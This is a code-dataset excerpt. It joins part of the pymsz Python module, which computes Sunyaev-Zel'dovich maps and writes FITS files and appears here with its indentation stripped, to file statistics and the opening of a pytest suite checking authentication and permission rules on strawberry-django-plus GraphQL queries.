# minz = pos[:, 2].min()
# maxz = pos[:, 2].max()
# self.pxs = np.min([maxx - minx, maxy - miny, maxz - minz]) / self.npl
# else:
self.pxs = np.min([maxx-minx, maxy-miny]) / self.npl # only for projected plane
if self.red > 0.:
if simd.cosmology['omega_matter'] != 0:
cosmo = FlatLambdaCDM(H0=simd.cosmology['h'] * 100,
Om0=simd.cosmology['omega_matter'])
else:
print('No cosmology loaded, assume WMAP7!')
cosmo = WMAP7
if self.ar is not None:
self.pxs = self.ar/cosmo.arcsec_per_kpc_proper(self.red).value # in kpc physical
if self.npl == 'auto':
self.npl = np.int32(self.rr*2/self.pxs)+1
else:
self.ar = self.pxs * cosmo.arcsec_per_kpc_proper(self.red).value
else:
if self.ar is None:
self.ar = 1.
# cut out unused data
if self.npl != 'auto':
idc = (pos[:, 0] >= -self.npl*self.pxs/2.) & (pos[:, 0] <= self.npl*self.pxs/2.) &\
(pos[:, 1] >= -self.npl*self.pxs/2.) & (pos[:, 1] <= self.npl*self.pxs/2.)
pos = pos[idc]
Tszdata = Tszdata[idc]
if hsml is not None:
hsml = hsml[idc]
if self.npl != np.int32(self.rr*2/self.pxs)+1:
self.rr = self.pxs * (self.npl-1) / 2.
# Tszdata /= (self.pxs * Kpc / simd.cosmology["h"])**2
if self.ngb is not None:
# need to change into pixel scale roughly calculate the maxi distance
tempr=np.sqrt(np.sum((simd.pos - simd.pos[simd.rho.argmin()])**2, axis=1))
tempr.sort()
ngbinp=tempr[self.ngb+1]/simd.cosmology['h']/(1+simd.cosmology['z'])/self.pxs
print('Convert the neighbor count in pixel size: ', ngbinp)
else:
ngbinp=self.ngb
if self.SD == 2:
self.ydata = SPH_smoothing(Tszdata, pos[:, :2], self.pxs, ngbinp, hsml=hsml,
pxln=self.npl, Memreduce=self.Memreduce, Ncpu=self.ncpu,
Ntasks=self.ntask, kernel_name=self.sph_kn)
else:
# be ware that zthick could cause some problems if it is larger than pxs*npl!!
# This has been taken in care in the rotate_data function.
self.ydata = SPH_smoothing(Tszdata, pos, self.pxs, ngbinp, hsml=hsml,
pxln=self.npl, Memreduce=self.Memreduce, Ncpu=self.ncpu,
Ntasks=self.ntask, kernel_name=self.sph_kn)
self.ydata = np.sum(self.ydata, axis=2)
self.ydata = self.ydata.T / self.pxs**2
def _cal_yt(self, simd): # Not work properly right now
# from yt.units import cm
Ptype = simd.prep_yt_TT()
if self.red is None:
self.red = simd.yt_ds.current_redshift
if self.ar is None:
rr = 2. * simd.radius
else:
if self.red <= 0.0:
self.red = 0.05
if simd.yt_ds.omega_matter != 0:
cosmo = FlatLambdaCDM(H0=simd.yt_ds.hubble_constant * 100,
Om0=simd.yt_ds.omega_matter)
else:
cosmo = WMAP7
self.pxs = cosmo.arcsec_per_kpc_proper(self.red) * self.ar * simd.yt_ds.hubble_constant
rr = self.npl * self.pxs
if isinstance(self.ax, type('x')):
projection = simd.yt_ds.proj(('deposit', Ptype + '_smoothed_Tsz'), self.ax,
center=simd.center, data_source=simd.yt_sp)
FRB = projection.to_frb(rr, self.npl)
self.ydata = FRB[('deposit', Ptype + '_smoothed_Tsz')]
def write_fits_image(self, fname, comments="None", overwrite=False):
r"""
Generate a image by binning X-ray counts and write it to a FITS file.
Parameters
----------
imagefile : string
The name of the image file to write.
comments : The comments in str will be put into the fit file header. Defualt: 'None'
It accepts str or list of str or tuple of str
overwrite : boolean, optional
Set to True to overwrite a previous file.
"""
# import pyfits as pf
import astropy.io.fits as pf
if fname[-5:] != ".fits":
fname = fname + ".fits"
hdu = pf.PrimaryHDU(self.ydata)
hdu.header["SIMPLE"] = 'T'
hdu.header.comments["SIMPLE"] = 'conforms to FITS standard'
hdu.header["BITPIX"] = int(-32)
hdu.header.comments["BITPIX"] = '32 bit floating point'
hdu.header["NAXIS"] = int(2)
hdu.header["NAXIS1"] = int(self.ydata.shape[0])
hdu.header["NAXIS2"] = int(self.ydata.shape[1])
hdu.header["EXTEND"] = True
hdu.header.comments["EXTEND"] = 'Extensions may be present'
hdu.header["RADECSYS"] = 'ICRS '
hdu.header.comments["RADECSYS"] = "International Celestial Ref. System"
hdu.header["CTYPE1"] = 'RA---TAN'
hdu.header.comments["CTYPE1"] = "Coordinate type"
hdu.header["CTYPE2"] = 'DEC--TAN'
hdu.header.comments["CTYPE2"] = "Coordinate type"
hdu.header["CUNIT1"] = 'deg '
hdu.header.comments["CUNIT1"] = 'Units'
hdu.header["CUNIT2"] = 'deg '
hdu.header.comments["CUNIT2"] = 'Units'
hdu.header["CRPIX1"] = float(self.npl/2.0)
hdu.header.comments["CRPIX1"] = 'X of reference pixel'
hdu.header["CRPIX2"] = float(self.npl/2.0)
hdu.header.comments["CRPIX2"] = 'Y of reference pixel'
hdu.header["CRVAL1"] = float(self.sp[0])
hdu.header.comments["CRVAL1"] = 'RA of reference pixel (deg)'
hdu.header["CRVAL2"] = float(self.sp[1])
hdu.header.comments["CRVAL2"] = 'Dec of reference pixel (deg)'
hdu.header["CD1_1"] = -float(self.ar/3600.)
hdu.header.comments["CD1_1"] = 'RA deg per column pixel'
hdu.header["CD1_2"] = float(0)
hdu.header.comments["CD1_2"] = 'RA deg per row pixel'
hdu.header["CD2_1"] = float(0)
hdu.header.comments["CD2_1"] = 'Dec deg per column pixel'
hdu.header["CD2_2"] = float(self.ar/3600.)
hdu.header.comments["CD2_2"] = 'Dec deg per row pixel'
hdu.header["RCVAL1"] = float(self.cc[0])
hdu.header.comments["RCVAL1"] = 'Real center X of the data'
hdu.header["RCVAL2"] = float(self.cc[1])
hdu.header.comments["RCVAL2"] = 'Real center Y of the data'
hdu.header["RCVAL3"] = float(self.cc[2])
hdu.header.comments["RCVAL3"] = 'Real center Z of the data'
hdu.header["UNITS"] = "kpc"
hdu.header.comments["UNITS"] = 'Units for the RCVAL and PSIZE'
hdu.header["PIXVAL"] = "y parameter"
hdu.header.comments["PIXVAL"] = 'The y parameter for thermal SZ effect.'
hdu.header["ORAD"] = float(self.rr)
hdu.header.comments["ORAD"] = 'Rcut in physical for the image.'
hdu.header["REDSHIFT"] = float(self.red)
hdu.header.comments["REDSHIFT"] = 'The redshift of the object being put to'
hdu.header["PSIZE"] = float(self.pxs)
hdu.header.comments["PSIZE"] = 'The pixel size in physical at simulation time'
hdu.header["AGLRES"] = float(self.ar)
hdu.header.comments["AGLRES"] = '\'observation\' angular resolution in arcsec'
hdu.header["ORIGIN"] = 'Software: PymSZ'
hdu.header.comments["ORIGIN"] = 'https://github.com/weiguangcui/pymsz.git'
hdu.header["VERSION"] = version.version # get_property('__version__')
hdu.header.comments["VERSION"] = 'Version of the software'
hdu.header["DATE-OBS"] = Time.now().tt.isot
if isinstance(comments, type([])) or isinstance(comments, type(())):
for j in range(len(comments)):
hdu.header["COMMENT"+str(j+1)] = comments[j]
elif isinstance(comments, type("")) or isinstance(comments, type('')):
hdu.header["COMMENT"] = comments
else:
raise ValueError("Do not accept this comments type! Please use str or list")
hdu.writeto(fname, overwrite=overwrite)
class TK_model(object):
r""" Theoretical calculation of sz-map for the kinetic SZ effect.
model = TK_model(model_file, npixel, axis)
Parameters
----------
simudata : the simulation data from load_data
npixel : number of pixels for your image, int.
Assume that x-y always have the same number of pixels.
It can be set to 'AUTO', then it will be decided by the halo radius and AR.
So, npixel='AUTO' and AR=None can not be set at the same time!
axis : can be 'x', 'y', 'z', or a list of degrees [alpha, beta, gamma],
which will rotate the data points by $\alpha$ around the x-axis,
$\beta$ around the y-axis, and $\gamma$ around the z-axis
SP : Faked sky positions in [RA (longitude), DEC (latitude)] in degrees.
Default: [194.95, 27.98], Coma' position.
# Need to find sometime to add lower functions
# If [x,y,z] (len(SP) == 3) of the Earth position in the simulation coordinate (in the same units) is given,
# The pos - [x,y,z] are taken as the J2000 3D coordinates and converted into RA, DEC.
neighbours: this parameter only works with simulation data (not yt data).
If this is set, it will force the SPH particles smoothed into nearby N
neighbours, HSML from the simulation will be ignored.
If no HSML provided in the simulation, neighbours = 27
AR : angular resolution in arcsec. Default : None.
Cluster's redshift with AR decides the image pixel size.
If None, the whole cluster will be projected to the image with npixel resolution.
The AR will be recalculated if z != 0.
If z = 0, AR is set to 1. Note this makes no sense to the ICRS coordinates.
SD : dimensions for SPH smoothing. Type: int. Default: 2.
Must be 2 or 3!
# pxsize : pixel size of the image. Type: float, unit: kpc. Default: None
# If set, this will invaided the calculation from AR.
Ncpu : number of CPU for parallel calculation. Type: int. Default: None, all cpus from the
computer will be used.
This parallel calculation is only for the SPH smoothing.
# periodic : periodic condition for the SPH smoothing region. Tyep: bool. Default: False.
# periodic condition works for the too fine mesh (which means oversmoothing),
# you can consider turn this on to avoid boundary effects. So, this is also for SPH.
redshift : The redshift where we put the cluster for observation.
Default : None, we will look it from simulation data.
Note : If redshift = 0, the returning results will be y_int, i.e. y*d^2_A,
which takes out the angular diameter distance.
This will also ingore the set of AR. The image pixel size =
2 * cluster radius/npixel, so the npixel MUST NOT be 'AUTO' at redshift = 0.
Highly recommended to put the cluster *NOT* at z = 0.
Note the physical positions of particles are always at the simulation time.
zthick : The thickness in projection direction. Default: None.
If None, use all data from cutting region. Otherwise set a value in simulation
length unit (kpc/h normally), then a slice of data [center-zthick, center+zthick]
will be used to make the y-map.
sph_kernel : The kernel used to smoothing the y values. Default : "cubic"
Choose from 'cubic': cubic spline; 'quartic': quartic spline;
'quintic': quintic spline; 'wendland2': Wendland C2; 'wendland4': Wendland C4;
'wendland6': Wendland C6;
Returns
-------
Theoretical projected omega-map in a given direction. 2D mesh data right now.
See also
--------
SZ_models for the mock SZ signal at different frequencies.
Notes
-----
The retrun is omega map, not the delta T_{kSZ}!, which equals omega*T_{cmb} ~ 2.73 k
This program does not accpte redshift=0 or AR == None with npixel = "AUTO",
the npixel will be reset to 500 for output.
If npixel is "AUTO" and AR != None, then the whole cluster will project to the image with
npixel = 2*radius/pixelsize, where pxielsize is given by AR.
If redshift=0 and AR == None, AR will be reset to 1, but this does not make a sense to the ICRS system!
Example
-------
mm=pymsz.TK_models(simudata, npixel=1024, "z")
mm.bdata # this contains the b-map
"""
def __init__(self, simudata, npixel=500, neighbours=None, axis='z', AR=None, SD=2,
SP=[194.95, 27.98], Ncpu=None, redshift=None, zthick=None, sph_kernel='cubic'):
if isinstance(npixel, type("")) or isinstance(npixel, type('')):
self.npl = npixel.lower()
else:
self.npl = npixel
self.ngb = neighbours
self.ax = axis
self.ar = AR
self.ncpu = Ncpu
self.bvel = 0 # bulk velocity after rotation
if redshift is None:
self.red = simudata.cosmology['z']
else:
self.red = redshift
self.zthick = zthick
self.pxs = None
self.SD = SD
self.bdata = np.array([])
self.sph_kn = sph_kernel
# self.ad = 1. # angular diameter distance normalized to 1 kpc
# if len(SP) == 2:
self.sp = SP
# self.cc = simd.center
# elif len(SP) == 3:
# self.sp = False
# self.cc = SP
# else:
# raise ValueError("SP length should be either 2 or 3!")
if self.ar is None and self.npl == 'auto':
print("Do not accept AR == None and npixel=='AUTO' !! \n npixel is reset to 500 !")
self.npl = 500
if self.SD not in [2, 3]:
raise ValueError("smoothing dimension must be 2 or 3" % SD)
if simudata.data_type == "snapshot":
self._cal_snap(simudata)
elif simudata.data_type == "yt_data":
self._cal_yt(simudata)
else:
raise ValueError("Do not accept this data type %s"
"Please try to use load_data to get the data" % simudata.data_type)
def _cal_snap(self, simd):
pos, vel, self.bvel = rotate_data(simd.pos/simd.cosmology['h']/(1+simd.cosmology['z']),
self.ax, vel=simd.vel, bvel=simd.bulkvel) # pos in physical
simd.prep_ss_KT(vel)
if self.red <= 0. and self.npl == 'auto':
print("Do not accept redshift == 0 and npixel=='AUTO' !! \n npixel is reset to 500! ")
self.npl = 500
self.cc = simd.center/simd.cosmology['h']/(1+simd.cosmology['z'])
self.rr = simd.radius/simd.cosmology['h']/(1+simd.cosmology['z'])
if self.zthick is not None:
self.zthick = self.zthick/simd.cosmology['h']/(1+simd.cosmology['z'])
idc = (pos[:, 2] > -self.zthick) & (pos[:, 2] < self.zthick)
pos = pos[idc]
Kszdata = simd.Kszdata[idc]
else:
Kszdata = np.copy(simd.Kszdata)
if isinstance(simd.hsml, type(0)):
self.ngb = 27
hsml = None
else: # with hsml
if self.ngb is None: # need to estimate neighbors
self.ngb=0
ids = np.sum((simd.pos - simd.pos[simd.hsml.argmin()])**2, axis=1) <= simd.hsml.min()**2
if simd.hsml[ids].size > self.ngb:
self.ngb = simd.hsml[ids].size
ids = np.sum((simd.pos - simd.pos[simd.hsml.argmax()])**2, axis=1) <= simd.hsml.max()**2
if simd.hsml[ids].size > self.ngb:
self.ngb = simd.hsml[ids].size
self.ngb = np.int32(self.ngb*1.05)+1 #to be safe
print('self.ngb = ', self.ngb)
if self.zthick is not None:
hsml = simd.hsml[idc]
else:
hsml = np.copy(simd.hsml)
hsml = hsml/simd.cosmology['h']/(1+simd.cosmology['z'])
else: # have set the neighbors, need to ignore the hsml
hsml = None
if self.npl != 'auto':
minx = pos[:, 0].min()
maxx = pos[:, 0].max()
miny = pos[:, 1].min()
maxy = pos[:, 1].max()
minz = pos[:, 2].min()
maxz = pos[:, 2].max()
self.pxs = np.min([maxx - minx, maxy - miny, maxz - minz]) / self.npl
if self.red > 0.:
if simd.cosmology['omega_matter'] != 0:
cosmo = FlatLambdaCDM(H0=simd.cosmology['h'] * 100,
Om0=simd.cosmology['omega_matter'])
else:
print('No cosmology loaded, assume WMAP7!')
cosmo = WMAP7
# self.ad = cosmo.angular_diameter_distance(self.red).to("kpc").value # in cm
if self.ar is not None:
self.pxs = self.ar / cosmo.arcsec_per_kpc_proper(self.red).value # in kpc physical
if self.npl == 'auto':
self.npl = np.int32(self.rr*2/self.pxs)+1
else:
self.ar = self.pxs * cosmo.arcsec_per_kpc_proper(self.red).value
else:
if self.ar is None:
self.ar = 1.
# cut out unused data
if self.npl != 'auto':
idc = (pos[:, 0] >= -self.npl*self.pxs/2.) & (pos[:, 0] <= self.npl*self.pxs/2.) &\
(pos[:, 1] >= -self.npl*self.pxs/2.) & (pos[:, 1] <= self.npl*self.pxs/2.)
pos = pos[idc]
Kszdata = Kszdata[idc]
if hsml is not None:
hsml = hsml[idc]
if self.npl != np.int32(self.rr*2/self.pxs)+1:
self.rr = self.pxs * (self.npl-1) / 2.
if self.SD == 2:
self.bdata = SPH_smoothing(Kszdata, pos[:, :2], self.pxs, self.ngb, hsml=hsml,
pxln=self.npl, Memreduce=self.Memreduce, Ncpu=self.ncpu,
kernel_name=self.sph_kn)
else:
self.bdata = SPH_smoothing(Kszdata, pos, self.pxs, self.ngb, hsml=hsml,
pxln=self.npl, Memreduce=self.Memreduce, Ncpu=self.ncpu,
kernel_name=self.sph_kn)
self.bdata = np.sum(self.bdata, axis=2)
self.bdata = self.bdata.T / self.pxs**2
def write_fits_image(self, fname, comments='None', overwrite=False):
r"""
Generate a image by binning X-ray counts and write it to a FITS file.
Parameters
----------
imagefile : string
The name of the image file to write.
radius : float, in unit of kpc
The virial radius of the cluster. Default is the physical size of the image.
comments : The comments in str will be put into the fit file header. Defualt: 'None'
It accepts str or list of str or tuple of str
overwrite : boolean, optional
Set to True to overwrite a previous file.
"""
import astropy.io.fits as pf
if fname[-5:] != ".fits":
fname = fname + ".fits"
hdu = pf.PrimaryHDU(self.bdata)
hdu.header["SIMPLE"] = 'T'
hdu.header.comments["SIMPLE"] = 'conforms to FITS standard'
hdu.header["BITPIX"] = int(-32)
hdu.header.comments["BITPIX"] = '32 bit floating point'
hdu.header["NAXIS"] = int(2)
hdu.header["NAXIS1"] = int(self.bdata.shape[0])
hdu.header["NAXIS2"] = int(self.bdata.shape[1])
hdu.header["EXTEND"] = True
hdu.header.comments["EXTEND"] = 'Extensions may be present'
hdu.header["RADECSYS"] = 'ICRS '
hdu.header.comments["RADECSYS"] = "International Celestial Ref. System"
hdu.header["CTYPE1"] = 'RA---TAN'
hdu.header.comments["CTYPE1"] = "Coordinate type"
hdu.header["CTYPE2"] = 'DEC--TAN'
hdu.header.comments["CTYPE2"] = "Coordinate type"
hdu.header["CUNIT1"] = 'deg '
hdu.header.comments["CUNIT1"] = 'Units'
hdu.header["CUNIT2"] = 'deg '
hdu.header.comments["CUNIT2"] = 'Units'
hdu.header["CRPIX1"] = float(self.npl/2.0)
hdu.header.comments["CRPIX1"] = 'X of reference pixel'
hdu.header["CRPIX2"] = float(self.npl/2.0)
hdu.header.comments["CRPIX2"] = 'Y of reference pixel'
hdu.header["CRVAL1"] = float(self.sp[0])
hdu.header.comments["CRVAL1"] = 'RA of reference pixel (deg)'
hdu.header["CRVAL2"] = float(self.sp[1])
hdu.header.comments["CRVAL2"] = 'Dec of reference pixel (deg)'
hdu.header["CD1_1"] = -float(self.ar/3600.)
hdu.header.comments["CD1_1"] = 'RA deg per column pixel'
hdu.header["CD1_2"] = float(0)
hdu.header.comments["CD1_2"] = 'RA deg per row pixel'
hdu.header["CD2_1"] = float(0)
hdu.header.comments["CD2_1"] = 'Dec deg per column pixel'
hdu.header["CD2_2"] = float(self.ar/3600.)
hdu.header.comments["CD2_2"] = 'Dec deg per row pixel'
hdu.header["RCVAL1"] = float(self.cc[0])
hdu.header.comments["RCVAL1"] = 'Real center X of the data'
hdu.header["RCVAL2"] = float(self.cc[1])
hdu.header.comments["RCVAL2"] = 'Real center Y of the data'
hdu.header["RCVAL3"] = float(self.cc[2])
hdu.header.comments["RCVAL3"] = 'Real center Z of the data'
hdu.header["UNITS"] = "kpc"
hdu.header.comments["UNITS"] = 'Units for the RCVAL and PSIZE'
hdu.header["PIXVAL"] = "omega"
hdu.header.comments["PIXVAL"] = 'T_{kSZ} = omega*T_{cmb}(~ 2.73)'
hdu.header["ORAD"] = float(self.rr)
hdu.header.comments["ORAD"] = 'Rcut in physical for the image'
hdu.header["REDSHIFT"] = float(self.red)
hdu.header.comments["REDSHIFT"] = 'The redshift of the object being put to'
hdu.header["PSIZE"] = float(self.pxs)
hdu.header.comments["PSIZE"] = 'The pixel size in physical at simulation time'
hdu.header["AGLRES"] = float(self.ar)
hdu.header.comments["AGLRES"] = '\'observation\' angular resolution in arcsec'
hdu.header["ORIGIN"] = 'Software: PymSZ'
hdu.header.comments["ORIGIN"] = 'https://github.com/weiguangcui/pymsz.git'
hdu.header["VERSION"] = version.version # get_property('__version__')
hdu.header.comments["VERSION"] = 'Version of the software'
hdu.header["DATE-OBS"] = Time.now().tt.isot
if isinstance(comments, type([])) or isinstance(comments, type(())):
for j in range(len(comments)):
hdu.header["COMMENT"+str(j+1)] = comments[j]
elif isinstance(comments, type("")) or isinstance(comments, type('')):
hdu.header["COMMENT"] = comments
else:
raise ValueError("Do not accept this comments type! Please use str or list")
hdu.writeto(fname, overwrite=overwrite)
| 49.727273
| 130
| 0.567611
| 4,414
| 32,820
| 4.18464
| 0.116448
| 0.05847
| 0.0497
| 0.011694
| 0.854908
| 0.836717
| 0.82459
| 0.818364
| 0.809756
| 0.802664
| 0
| 0.02115
| 0.312828
| 32,820
| 659
| 131
| 49.802731
| 0.797854
| 0.365174
| 0
| 0.765903
| 0
| 0.002545
| 0.159106
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017812
| false
| 0
| 0.020356
| 0
| 0.043257
| 0.020356
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c74c5bab8aad5fb008726bd7b566eb6282813431
| 24,185
|
py
|
Python
|
tests/test_permissions.py
|
hiporox/strawberry-django-plus
|
c648449034f43af8f94356820119d356f306110a
|
[
"MIT"
] | 44
|
2022-01-05T18:19:39.000Z
|
2022-03-26T11:49:40.000Z
|
tests/test_permissions.py
|
hiporox/strawberry-django-plus
|
c648449034f43af8f94356820119d356f306110a
|
[
"MIT"
] | 29
|
2022-01-19T21:48:25.000Z
|
2022-03-30T15:25:51.000Z
|
tests/test_permissions.py
|
hiporox/strawberry-django-plus
|
c648449034f43af8f94356820119d356f306110a
|
[
"MIT"
] | 5
|
2022-02-22T05:32:04.000Z
|
2022-03-30T14:21:32.000Z
|
from typing import List, Literal
from django.contrib.auth.models import Permission
from guardian.shortcuts import assign_perm
import pytest
from typing_extensions import TypeAlias
from strawberry_django_plus.relay import to_base64
from tests.faker import (
GroupFactory,
IssueFactory,
StaffUserFactory,
SuperuserUserFactory,
UserFactory,
)
from tests.utils import GraphQLTestClient
PermKind: TypeAlias = Literal["user", "group", "superuser"]
perm_kinds: List[PermKind] = ["user", "group", "superuser"]
@pytest.mark.django_db(transaction=True)
def test_is_authenticated(db, gql_client: GraphQLTestClient):
query = """
query Issue ($id: GlobalID!) {
issueLoginRequired (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)}, asserts_errors=False)
assert res.data is None
assert res.errors == [
{
"message": "User is not authenticated.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueLoginRequired"],
}
]
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issueLoginRequired": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
def test_is_authenticated_optional(db, gql_client: GraphQLTestClient):
query = """
query Issue ($id: GlobalID!) {
issueLoginRequiredOptional (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {"issueLoginRequiredOptional": None}
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issueLoginRequiredOptional": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
def test_staff_required(db, gql_client: GraphQLTestClient):
query = """
query Issue ($id: GlobalID!) {
issueStaffRequired (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)}, asserts_errors=False)
assert res.data is None
assert res.errors == [
{
"message": "User is not a staff member.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueStaffRequired"],
}
]
user = UserFactory.create()
with gql_client.login(user):
assert res.data is None
assert res.errors == [
{
"message": "User is not a staff member.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueStaffRequired"],
}
]
staff = StaffUserFactory.create()
with gql_client.login(staff):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issueStaffRequired": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
def test_staff_required_optional(db, gql_client: GraphQLTestClient):
query = """
query Issue ($id: GlobalID!) {
issueStaffRequiredOptional (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {"issueStaffRequiredOptional": None}
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {"issueStaffRequiredOptional": None}
staff = StaffUserFactory.create()
with gql_client.login(staff):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issueStaffRequiredOptional": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
def test_superuser_required(db, gql_client: GraphQLTestClient):
query = """
query Issue ($id: GlobalID!) {
issueSuperuserRequired (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)}, asserts_errors=False)
assert res.data is None
assert res.errors == [
{
"message": "User is not a superuser.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueSuperuserRequired"],
}
]
user = UserFactory.create()
with gql_client.login(user):
assert res.data is None
assert res.errors == [
{
"message": "User is not a superuser.",
"locations": [{"line": 3, "column": 9}],
"path": ["issueSuperuserRequired"],
}
]
superuser = SuperuserUserFactory.create()
with gql_client.login(superuser):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issueSuperuserRequired": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
def test_superuser_required_optional(db, gql_client: GraphQLTestClient):
query = """
query Issue ($id: GlobalID!) {
issueSuperuserRequiredOptional (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {"issueSuperuserRequiredOptional": None}
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {"issueSuperuserRequiredOptional": None}
superuser = SuperuserUserFactory.create()
with gql_client.login(superuser):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issueSuperuserRequiredOptional": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_perm_required(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue ($id: GlobalID!) {
issuePermRequired (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)}, asserts_errors=False)
assert res.data is None
assert res.errors == [
{
"message": "You don't have permission to access this resource.",
"locations": [{"line": 3, "column": 9}],
"path": ["issuePermRequired"],
}
]
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(
query,
{"id": to_base64("IssueType", issue.pk)},
asserts_errors=False,
)
assert res.data is None
assert res.errors == [
{
"message": "You don't have permission to access this resource.",
"locations": [{"line": 3, "column": 9}],
"path": ["issuePermRequired"],
}
]
if kind == "user":
user_with_perm = UserFactory.create()
user_with_perm.user_permissions.add(Permission.objects.get(codename="view_issue"))
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
group.permissions.add(Permission.objects.get(codename="view_issue"))
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
with gql_client.login(user_with_perm):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issuePermRequired": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_perm_required_optional(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue ($id: GlobalID!) {
issuePermRequiredOptional (id: $id) {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {"issuePermRequiredOptional": None}
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {"issuePermRequiredOptional": None}
if kind == "user":
user_with_perm = UserFactory.create()
user_with_perm.user_permissions.add(Permission.objects.get(codename="view_issue"))
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
group.permissions.add(Permission.objects.get(codename="view_issue"))
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
with gql_client.login(user_with_perm):
res = gql_client.query(query, {"id": to_base64("IssueType", issue.pk)})
assert res.data == {
"issuePermRequiredOptional": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_list_perm_required(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue {
issueListPermRequired {
id
name
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query)
assert res.data == {"issueListPermRequired": []}
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(query)
assert res.data == {"issueListPermRequired": []}
if kind == "user":
user_with_perm = UserFactory.create()
user_with_perm.user_permissions.add(Permission.objects.get(codename="view_issue"))
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
group.permissions.add(Permission.objects.get(codename="view_issue"))
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
with gql_client.login(user_with_perm):
res = gql_client.query(query)
assert res.data == {
"issueListPermRequired": [
{
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
}
]
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
def test_conn_perm_required(db, gql_client: GraphQLTestClient, kind: PermKind):
query = """
query Issue {
issueConnPermRequired {
totalCount
edges {
node {
id
name
}
}
}
}
"""
issue = IssueFactory.create()
res = gql_client.query(query)
assert res.data == {"issueConnPermRequired": {"edges": [], "totalCount": 0}}
user = UserFactory.create()
with gql_client.login(user):
res = gql_client.query(query)
assert res.data == {"issueConnPermRequired": {"edges": [], "totalCount": 0}}
if kind == "user":
user_with_perm = UserFactory.create()
user_with_perm.user_permissions.add(Permission.objects.get(codename="view_issue"))
elif kind == "group":
user_with_perm = UserFactory.create()
group = GroupFactory.create()
group.permissions.add(Permission.objects.get(codename="view_issue"))
user_with_perm.groups.add(group)
elif kind == "superuser":
user_with_perm = SuperuserUserFactory.create()
else: # pragma:nocover
raise AssertionError
with gql_client.login(user_with_perm):
res = gql_client.query(query)
assert res.data == {
"issueConnPermRequired": {
"edges": [
{
"node": {
"id": to_base64("IssueType", issue.pk),
"name": issue.name,
},
}
],
"totalCount": 1,
}
}
@pytest.mark.django_db(transaction=True)
@pytest.mark.parametrize("kind", perm_kinds)
